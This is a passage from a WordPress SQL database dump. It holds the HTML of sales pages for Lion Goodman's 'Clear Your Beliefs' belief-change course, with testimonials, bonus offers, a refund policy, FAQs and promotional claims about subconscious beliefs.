Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:10:30', '2014-06-18 02:10:30', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(998, 4194, '2014-06-17 21:15:02', '2014-06-18 02:15:02', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" 